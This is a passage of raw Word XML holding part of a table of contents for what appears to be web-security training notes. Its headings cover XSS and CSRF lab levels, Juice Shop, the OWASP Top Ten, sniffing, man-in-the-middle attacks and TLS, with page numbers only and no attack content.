            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F4898F7" w14:textId="1E828E42" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777199" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777199 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F210EAD" w14:textId="092FE6C8" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777200" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777200 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="723CDF9B" w14:textId="4241B488" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777201" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777201 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="245B3891" w14:textId="695E24AC" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777202" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS Stored &amp; Reflected – High Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777202 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A95E4DF" w14:textId="45C0CB4D" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777203" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777203 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="437A22D1" w14:textId="672FBF83" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777204" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777204 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F9683AB" w14:textId="3ADFBC4E" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777205" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777205 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C460580" w14:textId="63E80B1B" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777206" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777206 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="754DB2D3" w14:textId="06E22B68" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777207" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Juice Shop</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777207 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40D232C0" w14:textId="456A9F5F" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777208" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OWASP Top Ten</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777208 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AF1D161" w14:textId="1F98D346" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777209" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Self-Study</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777209 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09FA6A15" w14:textId="4C785AC9" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777210" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protocols and Servers</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777210 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66C4540F" w14:textId="45158A21" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777211" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sniffing Attack</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777211 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14D9B8A4" w14:textId="29737B3F" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777212" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Man in the Middle Attack (MITM)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777212 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F8D2259" w14:textId="25C44221" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777213" w:history="1">
            <w:r w:rsidR="00E67820" w:rsidRPr="006377B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Transport Layer Security (TLS)</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc114777213 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r w:rsidR="00E67820">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="646BA811" w14:textId="22E931C1" w:rsidR="00E67820" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc114777214" w:history="1">
